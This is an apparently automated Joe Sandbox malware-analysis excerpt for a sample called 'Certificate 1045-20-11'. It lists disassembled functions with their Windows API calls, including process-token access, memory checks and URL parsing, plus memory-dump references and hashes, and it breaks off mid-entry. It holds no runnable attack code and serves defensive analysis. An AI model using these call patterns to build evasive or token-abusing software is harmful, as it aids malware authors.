                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 6b82888aaaf7171eef13fb65b7e3a6546e01d97ff57486c3ddfb09fed9d6dae7
                                                                                • Instruction ID: 13e753b70a775070c93c7154e6e7c16c22cdb559e7088ef41eb7dae41a35eafc
                                                                                • Opcode Fuzzy Hash: 6b82888aaaf7171eef13fb65b7e3a6546e01d97ff57486c3ddfb09fed9d6dae7
                                                                                • Instruction Fuzzy Hash: A0F08232005669BBEB12AF98AC0DFCE3F69BF16311F084211FE11A10E187755551DB99
                                                                                Function 0087C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0087C84A
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0087C85D
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0087C864
                                                                                • AttachThreadInput.USER32(00000000), ref: 0087C86B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: a783085e35f253769a5b8359fec684b9a99804ba558e73c8f3be52d7e82ab89b
                                                                                • Instruction ID: 87548074378c9d3aadde311ee394e03f5b44eb8be4738c779dbb4a6acddbdafc
                                                                                • Opcode Fuzzy Hash: a783085e35f253769a5b8359fec684b9a99804ba558e73c8f3be52d7e82ab89b
                                                                                • Instruction Fuzzy Hash: 17E01571141228BADB20ABA2AC0DEDBBF2CFB167A1F008039B60D85461C6B1C580CBE0
                                                                                Function 0087B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0087B0D6
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0087AC9D), ref: 0087B0DD
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0087AC9D), ref: 0087B0EA
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0087AC9D), ref: 0087B0F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 660018369c388f7147b681cba702c63695c0322705d1bce98542c1f93733cd48
                                                                                • Instruction ID: 6bb236aca6be159705438bd29e673ea140df9e18aa6c3876640cabd681c1c3e1
                                                                                • Opcode Fuzzy Hash: 660018369c388f7147b681cba702c63695c0322705d1bce98542c1f93733cd48
                                                                                • Instruction Fuzzy Hash: 91E04F326013119BD7202FB65C0CF473BB9FF55791F018838A245D6040EA3484028760
                                                                                Function 0085B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 0085B496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0085B4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0085B4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 0085B4BD
                                                                                • GetWindowDC.USER32(?,00000000), ref: 008BDE2B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 008BDE38
                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 008BDE51
                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 008BDE6A
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 008BDE8A
                                                                                • ReleaseDC.USER32(?,00000000), ref: 008BDE95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 1946975507-0
                                                                                • Opcode ID: fc442391435fd7d3c4c6b06eaf8958e797aca7d4b580387634d9756bc5637b4e
                                                                                • Instruction ID: 390c535241d3dc218c6c904fc06a92a4348e4504c7178fe6be2ba0d29e52aedf
                                                                                • Opcode Fuzzy Hash: fc442391435fd7d3c4c6b06eaf8958e797aca7d4b580387634d9756bc5637b4e
                                                                                • Instruction Fuzzy Hash: 74E0C931100340ABDB216B64AC09BD97B21FB51336F188666FAA9980E2977185859B11
                                                                                Function 008BB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 2921048691f447a3feb65a182a2cfa83ead1b388a9310270a9746c9625b84d5a
                                                                                • Instruction ID: 1496880134052534f8fa2a5e6cf6a6d61c9d29de672477a7dcc425d6c85907db
                                                                                • Opcode Fuzzy Hash: 2921048691f447a3feb65a182a2cfa83ead1b388a9310270a9746c9625b84d5a
                                                                                • Instruction Fuzzy Hash: 4DE01AB1100304EFDB006F709848E6D7BB5FB5C355F118825FC5AC7211CA7498409B80
                                                                                Function 0087B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0087B2DF
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0087B2EB
                                                                                • CloseHandle.KERNEL32(?), ref: 0087B2F4
                                                                                • CloseHandle.KERNEL32(?), ref: 0087B2FC
                                                                                  • Part of subcall function 0087AB24: GetProcessHeap.KERNEL32(00000000,?,0087A848), ref: 0087AB2B
                                                                                  • Part of subcall function 0087AB24: HeapFree.KERNEL32(00000000), ref: 0087AB32
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 3551d11e67ed2667c069bff9ba767ee99fb019f68c305773c85a9187891d7112
                                                                                • Instruction ID: d462b990c6628f8c63a000d1a1e2a0b6ceca6649639cc55a79abe561e8060d7e
                                                                                • Opcode Fuzzy Hash: 3551d11e67ed2667c069bff9ba767ee99fb019f68c305773c85a9187891d7112
                                                                                • Instruction Fuzzy Hash: FEE0263A104505BBDB017BA5EC08C59FBB6FF993213108631F625816B5DB32A871EB91
                                                                                Function 008BB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 3f23e7c8df19217a618cc7884281b9a008f790f0e5465b5353f8290c667ed3ac
                                                                                • Instruction ID: 968e8152d1665ad69e6546200f80217792c3282707b31f936619d39dcbe3c716
                                                                                • Opcode Fuzzy Hash: 3f23e7c8df19217a618cc7884281b9a008f790f0e5465b5353f8290c667ed3ac
                                                                                • Instruction Fuzzy Hash: A7E012B1500304EFDB006F709848E297BB9FB5C355B118829FD9ACB211CA78A840CB80
                                                                                Function 0087DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0087DEAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                • Opcode ID: 84d82463cdbc5103fd10ae125d835bc4f74af207c69ed3dc44195bfec2cb8cc4
                                                                                • Instruction ID: f8b01d33fb53099895267b39d2b80a89b75dfa0a9e453ef07364cfd5bc633b3c
                                                                                • Opcode Fuzzy Hash: 84d82463cdbc5103fd10ae125d835bc4f74af207c69ed3dc44195bfec2cb8cc4
                                                                                • Instruction Fuzzy Hash: 33913670600705AFDB24DF64C884B6ABBB5FF48714F14856EF94ACB295DB71E841CB60
                                                                                Function 0085BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 0085BCDA
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0085BCF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: e0a10a0ab05c6cb88290d74822605eedd72e6cf0971cbba63f94207da1642c2f
                                                                                • Instruction ID: afbed950889fad9b55f43d9ea853ccd542ea33ed635d623bc820cc3d7b4c862d
                                                                                • Opcode Fuzzy Hash: e0a10a0ab05c6cb88290d74822605eedd72e6cf0971cbba63f94207da1642c2f
                                                                                • Instruction Fuzzy Hash: 205124714087449BE720AF28D886BAFBBE8FB95355F41484EF5C8811A2DF7089ACC757
                                                                                Function 0088C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 008444ED: __fread_nolock.LIBCMT ref: 0084450B
                                                                                • _wcscmp.LIBCMT ref: 0088C65D
                                                                                • _wcscmp.LIBCMT ref: 0088C670
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                • String ID: FILE
                                                                                • API String ID: 4029003684-3121273764
                                                                                • Opcode ID: 849fe25c93051206e6aa73fe9140c312040fdbbb9c17c8696320a4c583e6f01c
                                                                                • Instruction ID: d11788cae74e6c7bdb7e8b15b6897a9efde3d60e09474edc68cc38a7b938868f
                                                                                • Opcode Fuzzy Hash: 849fe25c93051206e6aa73fe9140c312040fdbbb9c17c8696320a4c583e6f01c
                                                                                • Instruction Fuzzy Hash: 1D41B672A0020ABADF20EAA89C41FEF77B9FF49714F010479F605E7181D6759A048B61
                                                                                Function 008AA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 008AA85A
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008AA86F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 87c48dd0423d5d3d9e672804e1bb9fabe4c4851ce2ab9e63165d323602f583af
                                                                                • Instruction ID: 4121610f87c4ebd6e4b5fb11f8d94b68a2944df4fb1bc74aa5163bcf98ac194f
                                                                                • Opcode Fuzzy Hash: 87c48dd0423d5d3d9e672804e1bb9fabe4c4851ce2ab9e63165d323602f583af
                                                                                • Instruction Fuzzy Hash: B7410875E013099FEB58CF68C880BEA7BB9FB09304F10006AE905EBB41D775A941CFA1
                                                                                Function 00895180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00895190
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008951C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_memset
                                                                                • String ID: |
                                                                                • API String ID: 1413715105-2343686810
                                                                                • Opcode ID: 1b8e76be0c1288929980b5f13701af49f12b41feb1f43fe67e5df4e4b27014b3
                                                                                • Instruction ID: fcb1e753dcf63feef9a4fecc58e571d4ea17ec5ddd7adcdb55c91877aecd59d8
                                                                                • Opcode Fuzzy Hash: 1b8e76be0c1288929980b5f13701af49f12b41feb1f43fe67e5df4e4b27014b3
                                                                                • Instruction Fuzzy Hash: 12314A71C01119ABCF41EFE4CC85AEE7FB9FF14704F100019F915A6166EB71AA06CBA1
                                                                                Function 008A975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 008A980E
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008A984A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: b3e8a31fe9c05e3bf7ebff24cda557ee80b88bc943e50f59e088803a33403b2f
                                                                                • Instruction ID: cf33b1acf41fc3e3083aa187d638b18de8653a02d0c9ca41f04fa801edfe9212
                                                                                • Opcode Fuzzy Hash: b3e8a31fe9c05e3bf7ebff24cda557ee80b88bc943e50f59e088803a33403b2f
                                                                                • Instruction Fuzzy Hash: 92317C71110604AEEB109F78CC80FBB77A9FF5A764F108629F9A9C7190DA35AC85D760
                                                                                Function 00885157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008851C6
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00885201
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 6e16741498a337669f366fbfa5b4bfb691cc07ddd822df21353a5515c43ad0e9
                                                                                • Instruction ID: 6c4a3f6c3db6647d3257d66787077eca672661967574aaa3b92be29d4f7a3ef4
                                                                                • Opcode Fuzzy Hash: 6e16741498a337669f366fbfa5b4bfb691cc07ddd822df21353a5515c43ad0e9
                                                                                • Instruction Fuzzy Hash: ED31F631600705EFEB25EF99D845BAEBBF5FF45390F144029ED81E61A0EB709A44CB11
                                                                                Function 0089658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __snwprintf
                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                • API String ID: 2391506597-2584243854
                                                                                • Opcode ID: 7da12c1476b5889526e20901ef076e1fa3ee9c1ee1131486263b3ddb9512b1fd
                                                                                • Instruction ID: e252bcffad34188819bf487f6d57ef1c20ca440371e986ab96d05b32bbdfd283
                                                                                • Opcode Fuzzy Hash: 7da12c1476b5889526e20901ef076e1fa3ee9c1ee1131486263b3ddb9512b1fd
                                                                                • Instruction Fuzzy Hash: 80215C7160021CAFCF11EFA8C882AAE77B4FF55740F044459F505EB286EB74EA55CBA2
                                                                                Function 008A93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008A945C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008A9467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: 2074adab33abd91871d37f33dc58ab90d7a7f21be76d69c265a05807a0b0e719
                                                                                • Instruction ID: c17298de8e6bbbf40af9e478cd1f126bbb43feeeffe673038fc092de8228e37d
                                                                                • Opcode Fuzzy Hash: 2074adab33abd91871d37f33dc58ab90d7a7f21be76d69c265a05807a0b0e719
                                                                                • Instruction Fuzzy Hash: D211B2B1315208AFFF219E58DC80EBB376EFB893A4F100125F958DB690D6759C528764
                                                                                Function 008A98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                  • Part of subcall function 0085D17C: GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                  • Part of subcall function 0085D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                • GetWindowRect.USER32(00000000,?), ref: 008A9968
                                                                                • GetSysColor.USER32(00000012), ref: 008A9982
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
